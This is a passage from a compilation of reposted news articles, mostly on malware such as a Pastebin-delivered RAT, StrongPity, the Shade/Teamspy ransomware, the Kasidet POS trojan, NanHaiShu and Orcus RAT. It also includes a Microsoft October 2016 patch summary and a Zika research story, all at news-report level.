  14. Dmitry Ponomarev, professor of computer science at Binghamton University, State University of New York, is the principal investigator of a project titled 'Practical Hardware-Assisted Always-On Malware Detection.' Credit: Jonathan Cohen/Binghamton University Fighting computer viruses isn't just for software anymore. Binghamton University researchers will use a grant from the National Science Foundation to study how hardware can help protect computers too. "The impact will potentially be felt in all computing domains, from mobile to clouds," said Dmitry Ponomarev, professor of computer science at Binghamton University, State University of New York. Ponomarev is the principal investigator of a project titled "Practical Hardware-Assisted Always-On Malware Detection." More than 317 million pieces of new malware—computer viruses, spyware, and other malicious programs—were created in 2014 alone, according to work done by Internet security teams at Symantec and Verizon. Malware is growing in complexity, with crimes such as digital extortion (a hacker steals files or locks a computer and demands a ransom for decryption keys) becoming large avenues of cyber attack. "This project holds the promise of significantly impacting an area of critical national need to help secure systems against the expanding threats of malware," said Ponomarev. "[It is] a new approach to improve the effectiveness of malware detection and to allow systems to be protected continuously without requiring the large resource investment needed by software monitors." Countering threats has traditionally been left solely to software programs, but Binghamton researchers want to modify a computer's central processing unit (CPU) chip—essentially, the machine's brain—by adding logic to check for anomalies while running a program like Microsoft Word. If an anomaly is spotted, the hardware will alert more robust software programs to check out the problem. The hardware won't be right about suspicious activity 100 percent of the time, but since the hardware is acting as a lookout at a post that has never been monitored before, it will improve the overall effectiveness and efficiency of malware detection. "The modified microprocessor will have the ability to detect malware as programs execute by analyzing the execution statistics over a window of execution," said Ponomarev. "Since the hardware detector is not 100-percent accurate, the alarm will trigger the execution of a heavy-weight software detector to carefully inspect suspicious programs. The software detector will make the final decision. The hardware guides the operation of the software; without the hardware the software will be too slow to work on all programs all the time." The modified CPU will use low complexity machine learning—the ability to learn without being explicitly programmed—to classify malware from normal programs, which is Yu's primary area of expertise. "The detector is, essentially, like a canary in a coal mine to warn software programs when there is a problem," said Ponomarev. "The hardware detector is fast, but is less flexible and comprehensive. The hardware detector's role is to find suspicious behavior and better direct the efforts of the software." Much of the work—including exploration of the trade-offs of design complexity, detection accuracy, performance and power consumption—will be done in collaboration with former Binghamton professor Nael Abu-Ghazaleh, who moved on to the University of California-Riverside in 2014. Lei Yu, associate professor of computer science at Binghamton University, is a co-principal investigator of the grant. Grant funding will support graduate students that will work on the project both in Binghamton and California, conference travel and the investigation itself. The three-year grant is for $275,000. Article source Other source: These researchers are modifying CPUs to detect security threats
  15. While it is not uncommon to find malware or code on Pastebin, it is a surprise to find a dropper that downloads the payload from Pastebin on the fly. The payload has turned out to be a RAT with keylogger capabilities. The dropper The dropper is not much more than an adaptable package to deliver the actual payload. This one is called VMWare.exe and the first screen of the installer pretends itself to be “WindowsInstall”. Although we are not entirely sure of its origin, this makes us consider a method of infection that is typical for sites offering cracks and keygens. The payload When we run the sample, we have noticed a connection to a specific Pastebin page. The code posted is a Visual Basic script that downloads and runs a file called Tempwinlogon.exe. The executable itself is posted in hexadecimal and reconstructed by the function in the script. We copied and altered the script to see where it puts the file. Don’t try this at home folks, at least not on a computer you need. Running unknown scripts that you happened to find somewhere isn’t always a good idea. The destination of the file turned out to be C:\Users\{username}\AppData\Local\Tempwinlogon.exe (on a system running Windows 7). The RAT This proved to be a .NET Trojan, detected by some vendors as Bladabindi, which is very similar to njRAT. It has keylogger functionality and connects to an IP in the 37.237.112.* range. keylogger The executable is copied to C:\Users\{username}\AppData\Roaming\Tr.exe and to C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\353cd7180c8c415bfffe6958aebb47d8.exe to gain persistence. If the running process (Tr.exe) is stopped (by using the Task Manager, for example), this results in an immediate BSOD as shown below: File details SHA1 VMWare.exe 45653c39e8201a0b3c469ae6208ad6f2ed9835a4 SHA1 Tempwinlogon.exe b777b4c35ba0933f310b885a28e972c578a39922 Detected by Malwarebytes Anti-Malware as Trojan.Agent.GenX.IPH The Malwarebytes Website Protection Module blocks all traffic to the C2 server. A full removal guide can be found on our forums. Do consider changing your passwords though, if you have been infected with this RAT, since the passwords might have been compromised by this threat. After we reported this to Pastebin, the source page has been taken down. Summary A dropper we analyzed downloaded the code for part of its payload from Pastebin on the fly. The payload turned out to be a RAT with keylogging capabilities. Article source
  16. Microsoft Security Bulletins October 2016 Microsoft Security Bulletins October 2016 provides you with an overview of all security and non-security patches Microsoft released in that month. Microsoft released updates for supported operating systems and other company products on today's patch day. This guide provides you with information on the patches and related information. It covers all security and non-security updates that Microsoft released, plus additional information and links that may prove useful. It begins with an executive summary highlighting the most important information about the October 2016 Patch day. This is followed by the list of affected Windows client and server operating systems, and other Microsoft products. The severity and number of updates is listed for each product so that you can see on first glance how products that you use are affected. What follows is the list of security bulletins, security advisories, and non-security updates that Microsoft released in October 2016. The last part lists download options, and links to additional resources. Microsoft Security Bulletins October 2016 Executive Summary Updates for Windows 7 and 8 are provided as monthly rollup patches instead of individual updates from this Patch day on. We covered this in detail, and suggest you check out this article for details. Microsoft released a total of 10 security bulletins on the October 2016 Patch Day. Five of the ten bulletins are rated with a maximum severity rating of critical (highest), the remaining five with a maximum severity rating of important (second highest). All Microsoft client and server operating systems are affected by vulnerabilities. Microsoft Silverlight, Microsoft .Net Framwork, Microsoft Office, and various business products are affected as well. Operating System Distribution All client versions of windows are affected by MS16-118, Ms16-120 and MS16-122 critically. Windows 8.1, RT 8.1 and Windows 10 are furthermore affected by MS16-127 critically. windows 10 on top of that is affected by MS16-119 critically. Windows 10 is also affected by MS16-126, rated important, which fixes issues in the Microsoft Internet Messaging API. MS16-119 is a cumulative security update for Microsoft Edge. MS16-127 updates the integrated Adobe Flash Player on those systems. Windows Vista: 3 critical, 2 important, 1 moderate Windows 7: 3 critical, 2 important, 1 moderate Windows 8.1: 4 critical, 2 important Windows RT 8.1: 4 critical, 2 important Windows 10: 5 critical, 3 important Windows Server 2008: 1 critical, 2 important, 1 moderate, 1 low Windows Server 2008 R2: 1 critical, 2 important, 1 moderate, 1 low Windows Server 2012 and 2012 R2: 1 critical, 2 important, 2 moderate Server core: 1 critical, 3 important Other Microsoft Products Microsoft .NET Framework Security Only Release: 1 important. Microsoft .NET Framework -Monthly Rollup Release: 1 important. Skype for Business 2016: 1 important. Microsoft Lync 2010, 2013: 1 important. Microsoft Live Meeting 2007 Console: 1 important. Microsoft Silverlight: 1 important Microsoft Office 2007, 2010: 2 important Microsoft Office 2013, 2013 RT, 2016: 1 important Microsoft Office for Mac 2011, 2016: 1 important: Microsoft Word Viewer: 2 important Microsoft Office Compatibility Pack Service Pack 3: 2 important Microsoft SharePoint Server 2010, 2013: 1 important Microsoft Office Web Apps 2010, 2013: 1 important Security Bulletins Red = critical MS16-118 -- Cumulative Security Update for Internet Explorer (3192887) This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. MS16-119 -- Cumulative Security Update for Microsoft Edge (3192890) This security update resolves vulnerabilities in Microsoft Edge. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Microsoft Edge. MS16-120 -- Security Update for Microsoft Graphics Component (3192884) This security update resolves vulnerabilities in Microsoft Windows, Microsoft .NET Framework, Microsoft Office, Skype for Business, Silverlight, and Microsoft Lync. MS16-121 -- Security Update for Microsoft Office (3194063) This security update resolves a vulnerability in Microsoft Office. An Office RTF remote code execution vulnerability exists in Microsoft Office software when the Office software fails to properly handle RTF files. MS16-122 -- Security Update for Microsoft Video Control (3195360) This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if Microsoft Video Control fails to properly handle objects in memory. MS16-123 -- Security Update for Windows Kernel-Mode Drivers (3192892) This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system. MS16-124 -- Security Update for Windows Registry (3193227) This security update resolves vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker can access sensitive registry information. MS16-125 -- Security Update for Diagnostics Hub (3193229) This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application. MS16-126 -- Security Update for Microsoft Internet Messaging API (3196067) This security update resolves a vulnerability in Microsoft Windows. An information disclosure vulnerability exists when the Microsoft Internet Messaging API improperly handles objects in memory. MS16-127 -- Security Update for Adobe Flash Player (3194343) This security update resolves vulnerabilities in Adobe Flash Player when installed on all supported editions of Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, and Windows 10. Security advisories and updates Non-security related updates KB3194798 -- Update for Windows 10 Version 1607 - The update includes quality improvements according to Microsoft. The history lists various fixes for issues, as well as security updates released today. See this page for details. KB3192392 -- Security only update for Windows 8.1 and Windows Server 2012 R2 Security updates to Microsoft Video Control, kernel-mode drivers, Microsoft Graphics Component, Windows registry, and Internet Explorer 11. KB3185331 - Monthly Rollup for Windows 8.1 and Windows Server 2012 R2 This security update includes improvements and fixes that were a part of update KB3185279 (released September 20, 2016) and also all security updates of KB3192392. KB3192391 -- Security only update for Windows 7 SP1 and Windows Server 2008 R2 SP Security updates to Windows authentication methods, Internet Explorer 11, Microsoft Graphics component, Microsoft Video Control, kernel-mode drivers, Windows registry, and Microsoft Internet Messaging API. KB3185330 -- Monthly Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1 This security update includes improvements and fixes that were a part of update KB3185278 (released September 20, 2016), and also resolves the security updates listed under KB3192391 KB3191208 -- Update for Windows 10 Version 1511 -- Can't install Windows servicing updates in Windows 10 Version 1511 KB3197099 -- Dynamic Update for Windows 10 Version 1607 -- Compatibility update for upgrading to Windows 10 Version 1607: October 11, 2016 KB890830 -- Windows Malicious Software Removal Tool - October 2016 KB2952664 -- Update for Windows 7 -- Compatibility update for upgrading Windows 7. See this article for details. KB2976978 -- Update for Windows 8.1 -- Compatibility update for Windows 8.1 and Windows 8. See this article for details. KB3192665 -- Update for Internet Explorer -- ActiveX installation that uses AXIS fails after you install MS16-104. KB3063109 -- Update for Windows 8.1, Windows Server 2012 R2, Windows Server 2012, Windows 7, and Windows Server 2008 R2 -- Hyper-V integration components update for Windows virtual machines that are running on a Windows 10-based host. KB3177467 -- Update for Windows Embedded Standard 7, Windows 7, and Windows Server 2008 R2 -- Servicing stack update for Windows 7 SP1 and Windows Server 2008 R2 SP1: September 20, 2016. KB3179930 -- Reliability Rollup for Microsoft .NET Framework 4.5.2, 4.6 and 4.6.1 on Windows 7 and Windows Server 2008 R2. KB3179949 -- Reliability Rollup for Microsoft .NET Framework 4.5.2 and 4.6 on Vista and Server 2008. KB3181988 -- Update for Windows 7 and Windows Server 2008 R2 -- SFC integrity scan reports and fixes an error in the usbhub.sys.mui file in Windows 7 SP1 and Windows Server 2008 R2 SP1. KB3182203 -- Update for Windows 8.1, Windows RT 8.1, Windows Server 2012 R2, Windows Embedded 8 Standard, Windows Server 2012, Windows Embedded Standard 7, Windows 7, Windows Server 2008 R2, Windows Server 2008, Windows Vista, and Windows XP Embedded -- September 2016 time zone change for Novosibirsk. KB3184143 -- Update for Windows 8.1 and Windows 7 -- Remove software related to the Windows 10 free upgrade offer. KB3184951 -- Reliability Rollup for Microsoft .NET Framework 4.5.2 on Windows Server 2012. KB3185278 -- Update for Windows 7 and Windows Server 2008 R2 -- September 2016 update rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1. Improved support for the Disk Cleanup tool to free up space by removing older Windows Updates after they are superseded by newer updates. Removed the Copy Protection option when ripping CDs in Windows Media Audio (WMA) format from Windows Media Player. Addressed issue that causes mmc.exe to consume 100% of the CPU on one processor after installing KB3125574. Addressed issue that causes the Generic Commands (GC) to fail upon attempting to install KB2919469 or KB2970228 on a device that already has KB3125574 installed. All reported changes here. KB3185279 -- Update for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 -- September 2016 update rollup for Windows 8.1 and Windows Server 2012 R2. Addressed issue that causes some USB storage devices to lose authorization when the device goes into the lowest power state, requiring user to re-authenticate using PIN when the device moves back to a working power state. Addressed issue that causes Windows Explorer to become unresponsive when sharing a folder that is the child of at least two shared parent folders. Addressed issue that causes a COM port to become unavailable after it is repeatedly opened and closed. Addressed issue that causes devices to lose connection to their virtual private network (VPN) a few seconds after connecting, if the connection is made using an integrated mobile broadband connection. All reported changes here KB3185280 -- Update for Windows Embedded 8 Standard and Windows Server 2012 -- September 2016 update rollup for Windows Server 2012. KB3186208 -- Reliability Rollup for Microsoft .NET Framework 4.5.2 on Windows 8.1 and Windows Server 2012 R2. KB3159635 -- Update for Windows 10 Version 1607 -- Windows 10 Update Assistant update. How to download and install the October 2016 security updates Updates are also provided via Microsoft's Download Center, monthly Security ISO image releases, and via Microsoft's Update Catalog. Direct Microsoft Update Catalog download links: Windows 7 Security-only October 2016 Windows 8.1 Security-only October 2016 Windows 8.1 Flash security patch October 2016 Additional resources Microsoft Security Bulletin Summary for October 2016 List of software updates for Microsoft products List of security advisories of 2016 Microsoft Update Catalog site Our in-depth update guide for Windows Windows 10 Update History Windows 8.1 Update History Windows 7 Update History Source
  17. A new strain of malware has been discovered by Kaspersky Labs, named 'StrongPity,' which targets users looking for two legitimate computer programs, WinRAR and TrueCrypt. WinRAR is a file archiver utility for Windows, which compresses and extracts files, while the latter is a discontinued encryption tool. The malware contains components that not only has the ability to give attackers complete control on the victim's computer, but also steal disk contents and download other software that the cybercriminals need. It was found that users in Italy and Belgium were affected the most, but there were also records found in Turkey, North Africa, and the Middle East. To be able to gather victims, the attackers have built special fake websites that supposedly host the two programs. One instance that was discovered by the researchers is that the criminals transposed two letters in a domain name, in order to fool the potential victim into thinking that the program was a legitimate WinRAR installer website. In the image above, clicking on the blue button will direct users to 'ralrab[.]com,' an obvious trickery done by cybercriminals to fool victims. Going through this link will lead unsuspecting users to the malicious software. Interestingly enough, there was a recorded case in Italy back in May where users were not directed to a fraudulent site anymore, but they were led to the StrongPity malware itself. StrongPity was also found directing visitors from popular software sharing websites to a poisoned installer of the TrueCrypt software. Malicious WinRAR links have been removed, but there were still redirects found on TrueCrypt installers by the end of September. According to Kurt Baumgartner, this method of cybercriminals can be compared to the Crouching Yeti/Energetic Bear attacks, which compromised legitimate software distribution websites. He states: "These tactics are an unwelcome and dangerous trend that the security industry needs to address. The search for privacy and data integrity should not expose an individual to offensive waterhole damage. Waterhole attacks are inherently imprecise, and we hope to spur discussion around the need for easier and improved verification of encryption tool delivery.” At this point, wherever in the world we may be, we advise our readers to exercise caution when it comes to downloading software from untrusted websites. Malware such as StrongPity are simply waiting for its next victim, potentially compromising your security in the long run once infected. Source: Kaspersky (1) (2) Article source
  18. Doctor Web’s specialists have discovered a new Linux Trojan written in the Rust programming language. The Trojan has been named Linux.BackDoor.Irc.16. Linux.BackDoor.Irc.16 is a typical backdoor program that executes commands issued by cybercriminals via the IRC (Internet Relay Chat) protocol. The Trojan connects to the public chat channel specified in its configuration and awaits its instructions. The Trojan can execute just four commands. It can connect to a specified chat channel; send cybercriminals information about an infected computer; send cybercriminals data about the applications running in a system; and delete itself from an infected machine. Unlike the majority of its counterparts, Linux.BackDoor.Irc.16 is written in Rust, a programming language whose creation was sponsored by Mozilla Research. Its first stable version was released in 2015. Linux.BackDoor.Irc.16 was designed to be a cross-platform Trojan—to make a version for Windows, for example, cybercriminals can just recompile this malware program. Doctor Web’s analysts believe that Linux.BackDoor.Irc.16 is, in fact, a prototype (Proof of Concept), because it cannot replicate itself, and the IRC channel used by the Trojan to receive commands from cybercriminals is not currently active. The signature for Linux.BackDoor.Irc.16 is already in the Dr.Web for Linux database, and it is successfully detected and removed by Doctor Web Anti-virus products. More about this Trojan Article source
  19. Scientists have found a potential treatment option for Zika that may protect babies from developing a severe birth defect, according to a new study from Yale University. By unraveling exactly how the virus causes microcephaly—a condition where babies are born with abnormally small heads and, usually, underdeveloped brains—researchers at Yale were able to test out a few existing antiviral treatments, and found some early signs of success with two, according to a paper published Wednesday in Cell Reports. “There is an urgent need to identify therapeutic approaches to halt Zika infection, especially in pregnant women," Marco Onorati, co-first author of the paper and a researcher at Yale, said in a press release. "In the interim, we hope these findings can lead to therapies that might minimize the damage caused by this virus." Earlier this year, scientists confirmed that Zika can cause microcephaly, but they still weren’t sure exactly how. Multiple studies have provided evidence that the Zika virus was damaging brain tissue, leading to microcephaly, but this latest research went a step further. By comparing neural stem cells in the lab with the brain tissue of a Zika-infected fetus that died from microcephaly, the team was able to find out how the Zika virus infects, damages, and kills the cells of a developing human brain. MRI scans compare a normal brain (left) and a microcephalic brain. The researchers found that the virus disrupts pTBK1, a protein that helps spur cell division in the growing brain. This causes the cells—which are essential for setting up the structure of the brain—to die, instead of multiply, and the virus also attacks these neural stem cells directly. Without these crucial cells, the brain isn’t able to fully develop, and microcephaly occurs. Armed with this new understanding, the researchers decided to test out a few existing antiviral treatments. Some of these treatments were ineffective on the lab cells, others actually made the infection worse, but two managed to stop the replication of Zika virus cells, protecting the neural stem cells from further damage. One of the treatments, Sofosbuvir, is already an FDA-approved drug used to treat Hepatitis C. Though this is promising, a lot more work needs to be done before a Zika treatment is confirmed, the researchers cautioned. “To be succinct: Sofusbuvir is not, at present, a medication that people currently facing Zika should use,” Marco Onorati, first author on the paper and a neuroscientist at Yale, told me via email. “Animal studies found no effect of Sofosbuvir on fetal development, but there have been no adequate studies of Sofosbuvir in pregnant women. Our studies would also need to be repeated, in vitro and in vivo, before we could be sure Sofusbuvir has an effect in Zika virus treatment and is safe.” Zika has been spreading rapidly throughout Latin America since the outbreak was first identified in Brazil last year. Currently, 56 nations are experiencing outbreaks, according to the CDC, and local transmission arrived in Miami earlier this summer. Though the vast majority of people infected with Zika have no symptoms, or only get a mild flu-like infection, Zika can cause microcephaly in some pregnant women and that threat has caused the greatest concern. Children born with microcephaly can have physical and developmental disabilities or face early death or miscarriage. Luckily, research like this helps us understand how Zika works, which means even if Sofusbuvir isn’t the right option, scientists now have a better chance at finding a treatment that does work. Combined with ongoing research on vector control and the rapid development of a vaccine, there’s hope that future children can be protected from Zika. Article source
  20. Crooks use RAT to assess the financial status of infected victims and decide on how much money to ask for New Shade ransomware version delivers a RAT to Russian businesses The crooks behind the most recent versions of Shade have added an interesting new tidbit to their malware, installing a modified version of TeamViewer on infected systems so they could spy on their targets and adjust the ransom note accordingly. This new Shade version only targets Russian companies that are running accounting software on their computers. New Shade version delivers a RAT, but only to Russian businesses Kaspersky researchers say that this new Shade version, prior to infecting the target, during its installation routine, actively scans the computer name for strings such as "BUH," "BUGAL," "БУХ," "БУГАЛ." These strings are likely to be found on computers used by the accounting departments at Russian-speaking companies. If Shade finds any of these strings, it stops the ransomware installation process and delivers another trojan called Teamspy, also known TVSPY, TVRAT, or SpY-Agent. The trojan contains a modified version of TeamViewer 6 that the malware authors have altered to hide its GUI. The trojan also includes the legitimate 7Zip archiving tool and the NirCmd command-line utility. Furthermore, the crooks are also installing the TeamViewer VPN driver and the RDP Wrapper Library, used to open VPN connections and interact with the RDP protocol. All of these utilities delivered inside Teamspy allow the crooks to modify OS settings on infected systems, open an RDP connection, and use TeamViewer to connect to the infected system. Crooks using Teamspy to determine the proper ransom sum Kaspersky suggests that the crooks are using Teamspy's RAT (Remote Access Trojan) features to gather intelligence on the infected computer, to determine the appropriate ransom sum. "The option of remote access to an infected accounting system allows the malefactor to secretly keep an eye on the victim’s activities and collect detailed information on the victim’s solvency in order to use the most efficient way of getting cash," suggests Kaspersky's Fedor Sinitsyn. Teamspy is quite a powerful RAT and allows a crook to record audio from infected systems, record the victim's desktop, run terminal commands, and download and install other executables. Crooks are delivering the Shade ransomware at a later point This last feature is most likely used to deliver the Shade ransomware at a later point in time, after crooks deemed the target important and decided on the ransom amount. Shade is one of today's most popular ransomware families, but Kaspersky researchers cracked its encryption and have provided a free decrypter via the No More Ransom initiative. Another name for the Shade ransomware is Troldesh. This is not the first time malware specifically targets Russian businesses. During late June, Dr.Web discovered a trojan coded in 1C, a programming language used mostly in Russa. This trojan was delivering ransomware to companies using 1C:Enterprise, a popular accounting software in Russia. Shade ransomware website Article source
  21. Cybercriminals have always retained an interest in creating malware for POS (Point-of-Sale) terminals used to process card payments. IT security specialists are aware of many POS Trojans that facilitate the transfer of intercepted consumer data to criminals. A modification of one such Trojan was recently examined by Doctor Web’s security researchers. The Trojan, named Trojan.Kasidet.1, is a modified version of Trojan.MWZLesson. For more information about this threat, read this article published by Doctor Web in September 2015. Trojan.MWZLesson can also intercept GET and POST requests sent via Mozilla Firefox, Google Chrome, Internet Explorer, and Maxthon browsers. Trojan.Kasidet.1 is distributed as a ZIP archive that contains a SCR file, which is a self-extracting SFX-RAR archive. This file then extracts and runs the main malicious payload. The Trojan first checks whether its copy and any virtual machines, emulators, and debuggers are present in the infected system. If Trojan.Kasidet.1 finds a program that can somehow hinder its operation, it terminates itself. If not, it gains administrator privileges and runs itself. Even though the User Accounts Control (UAC) system demonstrates a warning on the screen, the potential victim is thrown off guard because the running application (wmic.exe) appears to have been developed by Microsoft: The wmic.exe utility then runs the executable file of Trojan.Kasidet.1. Like Trojan.MWZLesson, it scans the computer’s memory for bank card track data obtained with the help of the POS terminal and transmits it to the Trojan’s command and control (C&C) server. In addition, it steals passwords for Outlook, Foxmail, and Thunderbird email applications and can be incorporated into Mozilla Firefox, Google Chrome, Microsoft Internet Explorer, and Maxthon browsers for the purpose of intercepting GET and POST requests. This malware program can also download and run another application or a malicious library on the infected computer, find a particular file on a disk, or generate a list of running processes and transmit it to the C&C server. However, unlike Trojan.MWZLesson, the C&C server addresses of Trojan.Kasidet.1 are placed in a decentralized domain zone—.bit (Namecoin). This is a system of alternative root DNS servers based on Bitcoin technology. Common browsers cannot access such network resources; however, Trojan.Kasidet.1 uses its own algorithm to get the IPs of its C&C servers. Although malware programs that use this Namecoin technology have been known since 2013, they are not frequently detected in the wild, unlike other Trojans. Dr.Web Anti-virus successfully detects and removes this Trojan, and, therefore, this malicious program poses no threat to Dr.Web users. More about this Trojan Article source
  22. F-Secure researchers say parties involved in the South China Sea arbitration case were infected with the data-stealing NanHaiShu Trojan. Cyber warfare appears to be the latest tool deployed in the territorial dispute over the South China Sea Hackers have used targeted malware to steal data from some of the governments and private sector organisations involved in the dispute over territory and sovereignty in the South China Sea. Cybersecurity company F-Secure Labs uncovered the malware, dubbed NanHaiShu by researchers, which it said targeted the Philippines Department of Justice, a major international law firm involved in the South China Sea case, and the organisers of November 2015's Philippines-based Asia-Pacific Economic Cooperation (APEC) Summit. Erka Koivunen, cyber security advisor at F-Secure, said the NanHaiShu campaign is particularly sophisticated in nature. "This isn't an ordinary, run-of-the-mill opportunist piece of malware, but something that somebody has put some thought into and effort into, running a campaign with a selected group of organisations and individuals that are being targeted." NanHaiShu is a remote access Trojan which is able to send any information from an infected machine to a remote command and control server with a Chinese IP address. All the machines targeted by the malware are within organisations that hold data on topics considered to be of strategic national interest to the Chinese government. F-Secure suspects that the malware was being used to gain better visibility of the legal proceedings around the South China Sea arbitration. "The finger points to the government of China, which would benefit from having a malware campaign against these targets," Koivunen claimed. China has consistently denied hacking other nations, and instead accuses others of launching espionage and hacking attacks against it. Given the data targeted for extraction by NanHaiShu is so sensitive and stored within organisations that, in theory, should be highly secure, how were hackers able to break into the networks, steal information, and remain undetected by victims? The answer is the perpetrators were using very carefully-prepared spear-phishing emails targeting people connected to the case, then using infected Excel spreadsheets to drop NanHaiShu into the system. "The Excel sheets were named in a fashion that invites the recipient to open up the document and ignore the displayed macro security warnings. Once the macros have been disabled, the malware drops an embedded Jscript file on the victim's machine, causing the computer to be infected. After that, it can be remotely commanded by the attackers," said Koivunen. The phishing emails were carefully crafted to ensure that precisely chosen targets would overrule warnings not to open the file. "The campaign is supported by previously-gathered intelligence on what these people are interested in and they're using timely topics, lingo specific to the profession, and were confident the recipients are in a position to disable macro warnings on Microsoft Office products, which isn't something which you can typically assume," says Koivunen. "You'd need to have knowledge that this is the case, otherwise it's an expensive campaign with no yield," he added, implying that the NanHaiShu campaign is one that's well resourced. While the emails were designed in such a way to ensure that the victims were mistakenly confident that the messages were from an authentic source, they still needed to override macro warnings from Microsoft Office in order to access the NanHaiShu-infected files. Therefore, if there's a lesson to be learned from this case, it's that macro security settings shouldn't be taken lightly -- they're likely protecting your system from a malicious intrusion. The latest version of Microsoft Office already offers new tactical features to protect against these sorts of attacks. Full details on the malware are outlined in F-Secure's NanHaiShu: RATing the South China Sea report. Article source
  23. Security expert and leading investigative journalist Brian Krebs, in collaboration with security professional Daniel Gallagher, has recently discovered that a popular remote administration tool known as “Orcus RAT” is actually exhibiting the sort of behavior which is generally associated with a remote access trojan – a nasty piece of malware. [RAT: Wikipedia] Canadian Man Behind Popular ‘Orcus RAT’ Far too many otherwise intelligent and talented software developers these days apparently think they can get away with writing, selling and supporting malicious software and then couching their commerce as a purely legitimate enterprise. Here’s the story of how I learned the real-life identity of Canadian man who’s laboring under that same illusion as proprietor of one of the most popular and affordable tools for hacking into someone else’s computer. Earlier this week I heard from Daniel Gallagher, a security professional who occasionally enjoys analyzing new malicious software samples found in the wild. Gallagher said he and members of @malwrhunterteam and @MalwareTechBlog recently got into a Twitter fight with the author of Orcus RAT, a tool they say was explicitly designed to help users remotely compromise and control computers that don’t belong to them. A still frame from a Youtube video demonstrating Orcus RAT’s keylogging ability to steal passwords from Facebook and other sites. The author of Orcus — a person going by the nickname “Ciriis Mcgraw” a.k.a. “Armada” on Twitter and other social networks — claimed that his RAT was in fact a benign “remote administration tool” designed for use by network administrators and not a “remote access Trojan” as critics charged. Gallagher and others took issue with that claim, pointing out that they were increasingly encountering computers that had been infected with Orcus unbeknownst to the legitimate owners of those machines. The malware researchers noted another reason that Mcgraw couldn’t so easily distance himself from how his clients used the software: He and his team are providing ongoing technical support and help to customers who have purchased Orcus and are having trouble figuring out how to infect new machines or hide their activities online. What’s more, the range of features and plugins supported by Armada, they argued, go well beyond what a system administrator would look for in a legitimate remote administration client like Teamviewer, including the ability to launch a keylogger that records the victim’s every computer keystroke, as well as a feature that lets the user peek through a victim’s Web cam and disable the light on the camera that alerts users when the camera is switched on. A new feature of Orcus announced July 7 lets users configure the RAT so that it evades digital forensics tools used by malware researchers, including an anti-debugger and an option that prevents the RAT from running inside of a virtual machine. Other plugins offered directly from Orcus’s tech support page (PDF) and authored by the RAT’s support team include a “survey bot” designed to “make all of your clients do surveys for cash;” a “USB/.zip/.doc spreader,” intended to help users “spread a file of your choice to all clients via USB/.zip/.doc macros;” a “Virustotal.com checker” made to “check a file of your choice to see if it had been scanned on VirusTotal;” and an “Adsense Injector,” which will “hijack ads on pages and replace them with your Adsense ads and disable adblocker on Chrome.” WHO IS ARMADA? Gallagher said he was so struck by the guy’s “smugness” and sheer chutzpah that he decided to look closer at any clues that Ciriis Mcgraw might have left behind as to his real-world identity and location. Sure enough, he found that Ciriis Mcgraw also has a Youtube account under the same name, and that a video Mcgraw posted in July 2013 pointed to a 33-year-old security guard from Toronto, Canada. Gallagher noticed that the video — a bystander recording on the scene of a police shooting of a Toronto man — included a link to the domain policereview[dot]info. A search of the registration records attached to that Web site name show that the domain was registered to a John Revesz in Toronto and to the email address [email protected] A reverse WHOIS lookup ordered from Domaintools.com shows the same [email protected] address was used to register at least 20 other domains, including “thereveszfamily.com,” “johnrevesz.com, revesztechnologies[dot]com,” and — perhaps most tellingly — “lordarmada.info“. Johnrevesz[dot]com is no longer online, but this cached copy of the site from the indispensable archive.org includes his personal résumé, which states that John Revesz is a network security administrator whose most recent job in that capacity was as an IT systems administrator for TD Bank. Revesz’s LinkedIn profile indicates that for the past year at least he has served as a security guard for GardaWorld International Protective Services, a private security firm based in Montreal. Revesz’s CV also says he’s the owner of the aforementioned Revesz Technologies, but it’s unclear whether that business actually exists; the company’s Web site currently redirects visitors to a series of sites promoting spammy and scammy surveys, come-ons and giveaways. IT’S IN THE EULA, STUPID! Contacted by KrebsOnSecurity, Revesz seemed surprised that I’d connected the dots, but beyond that did not try to disavow ownership of the Orcus RAT. “Profit was never the intentional goal, however with the years of professional IT networking experience I have myself, knew that proper correct development and structure to the environment is no free venture either,” Revesz wrote in reply to questions about his software. “Utilizing my 15+ years of IT experience I have helped manage Orcus through its development.” Revesz continued: “As for your legalities question. Orcus Remote Administrator in no ways violates Canadian laws for software development or sale. We neither endorse, allow or authorize any form of misuse of our software. Our EULA [end user license agreement] and TOS [terms of service] is very clear in this matter. Further we openly and candidly work with those prudent to malware removal to remove Orcus from unwanted use, and lock out offending users which may misuse our software, just as any other company would.” Revesz said none of the aforementioned plugins were supported by Orcus, and were all developed by third-party developers, and that “Orcus will never allow implementation of such features, and or plugins would be outright blocked on our part.” In an apparent contradiction to that claim, plugins that allow Orcus users to disable the Webcam light on a computer running the software and one that enables the RAT to be used as a “stresser” to knock sites and individuals users offline are available directly from Orcus Technologies’ Github page. Revesz’s also offers a service to help people cover their tracks online. Using his alter ego “Armada” on the hacker forum Hackforums[dot]net, Revesz also sells a “bulletproof dynamic DNS service” that promises not to keep records of customer activity. Dynamic DNS services allow users to have Web sites hosted on servers that frequently change their Internet addresses. This type of service is useful for people who want to host a Web site on a home-based Internet address that may change from time to time, because dynamic DNS services can be used to easily map the domain name to the user’s new Internet address whenever it happens to change. Unfortunately, these dynamic DNS providers are extremely popular in the attacker community, because they allow bad guys to keep their malware and scam sites up even when researchers manage to track the attacking IP address and convince the ISP responsible for that address to disconnect the malefactor. In such cases, dynamic DNS allows the owner of the attacking domain to simply re-route the attack site to another Internet address that he controls. Free dynamic DNS providers tend to report or block suspicious or outright malicious activity on their networks, and may well share evidence about the activity with law enforcement investigators. In contrast, Armada’s dynamic DNS service is managed solely by him, and he promises in his ad on Hackforums that the service — to which he sells subscriptions of various tiers for between $30-$150 per year — will not log customer usage or report anything to law enforcement. According to writeups by Kaspersky Lab and Heimdal Security, Revesz’s 